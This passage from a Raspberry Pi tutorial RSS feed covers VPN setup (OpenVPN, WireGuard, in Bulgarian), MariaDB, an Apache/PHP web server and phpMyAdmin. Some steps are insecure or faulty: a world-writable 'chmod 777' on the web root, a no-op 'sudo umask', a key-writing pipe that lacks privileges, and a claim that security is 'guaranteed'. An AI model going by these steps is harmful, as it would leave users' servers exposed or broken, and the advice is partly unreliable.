&lt;br /&gt;
#### **8. Създаване на клиентска конфигурация** &amp;nbsp;&lt;br /&gt;
Създайте файл `client1.ovpn`: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
nano ~/client1.ovpn&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Поставете следното (като замените със съответните сертификати): &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
client&lt;br /&gt;
dev tun&lt;br /&gt;
proto udp&lt;br /&gt;
remote YOUR_PUBLIC_IP 1194 &amp;nbsp;# Заменете с публичния IP на Pi&lt;br /&gt;
resolv-retry infinite&lt;br /&gt;
nobind&lt;br /&gt;
persist-key&lt;br /&gt;
persist-tun&lt;br /&gt;
remote-cert-tls server&lt;br /&gt;
cipher AES-256-CBC&lt;br /&gt;
verb 3&lt;br /&gt;
&amp;lt;ca&amp;gt;&lt;br /&gt;
[PASTE ca.crt CONTENTS HERE]&lt;br /&gt;
&amp;lt;/ca&amp;gt;&lt;br /&gt;
&amp;lt;cert&amp;gt;&lt;br /&gt;
[PASTE client1.crt CONTENTS HERE]&lt;br /&gt;
&amp;lt;/cert&amp;gt;&lt;br /&gt;
&amp;lt;key&amp;gt;&lt;br /&gt;
[PASTE client1.key CONTENTS HERE]&lt;br /&gt;
&amp;lt;/key&amp;gt;&lt;br /&gt;
&amp;lt;tls-auth&amp;gt;&lt;br /&gt;
[PASTE ta.key CONTENTS HERE]&lt;br /&gt;
&amp;lt;/tls-auth&amp;gt;&lt;br /&gt;
key-direction 1&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## ** Вариант 2: WireGuard на Raspberry Pi** &amp;nbsp;&lt;br /&gt;
WireGuard е **по-бърз и лесен** за настройка. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Инсталиране** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt install wireguard -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Генериране на ключове** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
cd /etc/wireguard&lt;br /&gt;
sudo umask 077&lt;br /&gt;
sudo wg genkey | tee privatekey | wg pubkey &amp;gt; publickey&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Конфигуриране на сървъра** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo nano /etc/wireguard/wg0.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Пример: &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
[Interface]&lt;br /&gt;
Address = 10.0.0.1/24&lt;br /&gt;
PrivateKey = [YOUR_SERVER_PRIVATE_KEY]&lt;br /&gt;
ListenPort = 51820&lt;br /&gt;
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
&lt;br /&gt;
[Peer]&lt;br /&gt;
PublicKey = [CLIENT_PUBLIC_KEY]&lt;br /&gt;
AllowedIPs = 10.0.0.2/32&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Стартиране** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo systemctl enable wg-quick@wg0&lt;br /&gt;
sudo systemctl start wg-quick@wg0&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## ** Финален етап (и за двата метода)** &amp;nbsp;&lt;br /&gt;
1. **Port Forwarding** – пренасочете **UDP 1194 (OpenVPN)** или **UDP 51820 (WireGuard)** в рутера. &amp;nbsp;&lt;br /&gt;
2. **Dynamic DNS** (ако имате динамичен IP) – използвайте **No-IP** или **DuckDNS**. &amp;nbsp;&lt;br /&gt;
3. **Свързване от клиенти** – използвайте съответния клиентски софтуер. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### ** Заключение** &amp;nbsp;&lt;br /&gt;
- **OpenVPN**: Подходящ за **всички устройства**, но по-сложен. &amp;nbsp;&lt;br /&gt;
- **WireGuard**: **По-бърз** и лесен, идеален за **мобилни устройства**. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;**Готово!** Вашият Raspberry Pi вече е **VPN сървър**. Безопасен браузънг и отдалечен достъп са ви гарантирани. </description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/67/how-to-use-raspberry-pi-for-vpn</guid>
<pubDate>Tue, 25 Mar 2025 20:59:26 +0000</pubDate>
</item>
<item>
<title>How to Install MariaDB on Raspberry Pi?</title>
<link>https://asky.uk/66/how-to-install-mariadb-on-raspberry-pi</link>
<description>&lt;h3 class="wp-block-heading"&gt;Install MariaDB server&lt;/h3&gt;&lt;p&gt;As said in the introduction, MariaDB is available in the Raspberry Pi OS repository, so the installation is straightforward. Open a terminal (or connect via SSH) and follow the instructions:&lt;/p&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;As always, &lt;strong&gt;start by updating your system&lt;/strong&gt;:&lt;br&gt;&lt;code&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;/div&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;Then you can &lt;strong&gt;install MariaDB&lt;/strong&gt; with this command:&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;code&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sudo apt install mariadb-server&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;ul class="wp-block-list"&gt;&lt;li&gt;&lt;strong&gt;Type “Y” and Enter to continue.&lt;/strong&gt;&lt;br&gt;After a few seconds, the installation process is complete and MariaDB is almost ready to use.&lt;/li&gt;&lt;/ul&gt;&lt;p data-slot-rendered-content="true"&gt;If you’ve noticed it, the installation of MariaDB has also installed the MariaDB client.&lt;br&gt;This will allow you to connect from the command line with:&lt;br&gt;&lt;code&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; mysql&lt;/code&gt;&lt;/p&gt;&lt;h3 class="wp-block-heading"&gt;Root access&lt;/h3&gt;&lt;p&gt;Here is how to define the password for the root user and start to use MariaDB:&lt;/p&gt;&lt;ul data-slot-rendered-content="true" class="wp-block-list"&gt;&lt;li&gt;&lt;strong&gt;Enter this command:&lt;/strong&gt;&lt;br&gt;&lt;code&gt;sudo mysql_secure_installation&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Press enter to continue&lt;/strong&gt; (no password by default).&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Press “Y” to switch &lt;/strong&gt;to unix_socket authentication.&lt;/li&gt;&lt;li&gt;Then &lt;strong&gt;type “Y” to set a new password, and enter the password of your choice&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;Now, &lt;strong&gt;press “Y” three more times&amp;nbsp;&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;Remove anonymous users.&lt;/li&gt;&lt;li&gt;Disallow root login remotely.&lt;/li&gt;&lt;li&gt;Remove the test database.&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;And finally, &lt;strong&gt;press “Y” again to reload the privileges.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;p data-slot-rendered-content="true"&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/66/how-to-install-mariadb-on-raspberry-pi</guid>
<pubDate>Mon, 24 Mar 2025 21:31:59 +0000</pubDate>
</item>
<item>
<title>Web server on any Raspberry Pi?</title>
<link>https://asky.uk/2/web-server-on-any-raspberry-pi</link>
<description>&lt;p&gt;Now you have to install a server on the raspberry pi, the easiest is the Apache Server (Lighttpd also works if you are looking for something lighter) run the following commands to install Apache, PHP5, PHP5 mod for apache and MYSQL( if you are planning to use a CMS or a database.&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo apt-get update&lt;br&gt;&lt;br&gt;sudo apt-get install apache2 php5 libapache2-mod-php5&lt;/strong&gt;&lt;br&gt;&lt;br&gt;now you should allow overrides by editing the 000-default file, you can do that using the following comands..&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo nano /etc/apache2/sites-enabled/000-default&lt;/strong&gt;&lt;br&gt;&lt;br&gt;now edit the following lines&lt;br&gt;&lt;br&gt;change "&lt;strong&gt;AllowOverride None&lt;/strong&gt;" -to "&lt;strong&gt;AllowOverride ALL&lt;/strong&gt;".&lt;br&gt;&lt;br&gt;now execute&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo service apache2 restart&lt;/strong&gt;&lt;br&gt;&lt;br&gt;to restart apache witht your new settings&lt;br&gt;&lt;br&gt;now your site should be up and running u can go to /var/ and change the permissions on www, making it writable.&lt;br&gt;&lt;br&gt;&lt;strong&gt;cd /var/&lt;br&gt;sudo chmod 777 /www&lt;/strong&gt;&lt;br&gt;&lt;br&gt;this will enable you to login using &lt;a href="http://winscp.net/eng/index.php" rel="nofollow noopener noreferrer"&gt;WINSCP&lt;/a&gt;&amp;nbsp;and upload HTML pages to your new site. open the browser on your PC and point to 192.168.xx.xx (ip address of you raspberry pi) to view the default page.&lt;br&gt;&lt;br&gt;You can also install and SQL server using the following comands, with a &lt;strong&gt;PHP&lt;/strong&gt; and &lt;strong&gt;SQL&lt;/strong&gt; running on your server u can have a CMs like Drupal running on it.&lt;br&gt;&lt;br&gt;&lt;strong&gt;sudo apt-get install mysql-server mysql-client php5-mysql&lt;/strong&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/2/web-server-on-any-raspberry-pi</guid>
<pubDate>Wed, 19 Mar 2025 08:24:05 +0000</pubDate>
</item>
<item>
<title>How to install phpmyadmin in Raspberry Pi?</title>
<link>https://asky.uk/1/how-to-install-phpmyadmin-in-raspberry-pi</link>
<description>&lt;p&gt;&lt;strong class="step_numbering"&gt;1.&lt;/strong&gt;&amp;nbsp;To install the PHPMyAdmin package to our Raspberry Pi, have to run the command below.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo apt install phpmyadmin&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;2.&lt;/strong&gt;&amp;nbsp;Select the “&lt;strong&gt;apache2&lt;/strong&gt;” option by pressing&amp;nbsp;&lt;strong&gt;SPACE&lt;/strong&gt;&amp;nbsp;and then&amp;nbsp;&lt;strong&gt;ENTER&lt;/strong&gt;. Select this option even if you are using NGINX as we will configure that ourselves latest on.&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;3.&lt;/strong&gt;&amp;nbsp;Next, we will need to configure PHPMyAdmin to connect to our MYSQL server. We will also need set up some details so that we can log in to the PHPMyAdmin software.&lt;/p&gt;&lt;p&gt;To do this select “&lt;strong&gt;&amp;lt;Yes&amp;gt;&lt;/strong&gt;” at the next prompt.&lt;/p&gt;&lt;p&gt;&lt;img src="https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup.png" alt="Raspbian PHPMyAdmin setup" data-lazy-srcset="https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup.png 728w, https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup-300x187.png 300w, https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup-400x250.png 400w, https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup-600x374.png 600w" data-lazy-sizes="(max-width: 728px) 100vw, 728px" data-lazy-src="https://pi.lbbcdn.com/wp-content/uploads/2019/07/Raspberry-Pi-PHPMyAdmin-setup.png" data-was-processed="true" style="height:454px; width:728px" class="aligncenter lazyloaded size-full wp-image-33455175"&gt;&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;4.&lt;/strong&gt; Set a password for PHPMyAdmin itself. It is best to set this password to something different to your root SQL password. Doing this will help secure the server.&lt;/p&gt;&lt;p&gt;This password is what PHPMyAdmin will use to connect to the MySQL server.&lt;/p&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;5.&lt;/strong&gt; Create a new user:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo mysql -u root -p&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;6.&lt;/strong&gt; Run the command below to create a user and permit it to access all databases&lt;/p&gt;&lt;p&gt;Make sure you replace “&lt;strong&gt;username&lt;/strong&gt;” with the&amp;nbsp;&lt;strong&gt;username of your choice&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Also, replace “&lt;strong&gt;password&lt;/strong&gt;” with a&amp;nbsp;&lt;strong&gt;secure password&lt;/strong&gt;&amp;nbsp;of your choice.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;GRANT ALL PRIVILEGES ON *.* TO 'username'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong class="step_numbering"&gt;7.&lt;/strong&gt;&amp;nbsp;You can exit out of the MySQL command line interface by typing “&lt;strong&gt;quit&lt;/strong&gt;” in the terminal.&lt;/p&gt;&lt;p&gt;Once done you can proceed to configure PHPMyAdmin for Apache or NGINX.&lt;/p&gt;&lt;p&gt;access your Raspberry Pi’s PHPMyAdmin interface:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;http://localhost/phpmyadmin&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/1/how-to-install-phpmyadmin-in-raspberry-pi</guid>
<pubDate>Tue, 18 Mar 2025 21:44:37 +0000</pubDate>
</item>
</channel>
</rss>